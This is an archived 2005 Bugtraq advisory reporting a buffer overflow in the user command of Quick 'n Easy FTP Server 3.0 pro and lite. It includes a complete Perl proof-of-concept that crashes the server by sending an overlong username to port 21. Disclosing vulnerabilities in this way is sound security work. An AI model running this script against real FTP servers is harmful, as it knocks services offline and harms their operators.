[40061] in bugtraq

home help back first fref pref prev next nref lref last post

Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow

daemon@ATHENA.MIT.EDU (matiteman@securityfocus.com,"[at]")
Tue Aug 2 13:53:53 2005

Date: 2 Aug 2005 13:58:47 -0000
Message-ID: <20050802135847.30581.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: matiteman@securityfocus.com, "[at]"@securityfocus.com,
        hotmail.com@securityfocus.com
To: bugtraq@securityfocus.com

Details:
========

Input to the user commands is not properly checked

and/or filtered. Issuing a long argument to the user (about 1024 caracteres)

commands will cause the corresponding process to die without any error message.

this vulnerabilities exist in both the professionnal version 3.0 and lite version 3.0



Exploits:
========

Run the following PERL script against the server. The corresponding

process will die.



#=====testserver.pl =====

#

# Usage: testserver.pl <ip>

# testserver.pl 127.0.0.1

# bug discovered by : matiteman

# exploit coded by : matiteman

# thanks to : Reed Arvin (peachfuzz)

# Quick 'n Easy FTP Server 3.0 (pro and lite)

# Download:

# http://www.pablosoftwaresolutions.com/

#

##########################################



use IO::Socket;

use strict;



my($socket) = "";



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "21",

Proto => "TCP"))

{

print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";



sleep(1);



print $socket "user " . "A" x 1024 . "\r\n";



sleep(1);



close($socket);

}

else

{

print "Cannot connect to $ARGV[0]:21\n";

}

#===== testserver.pl =====

home help back first fref pref prev next nref lref last post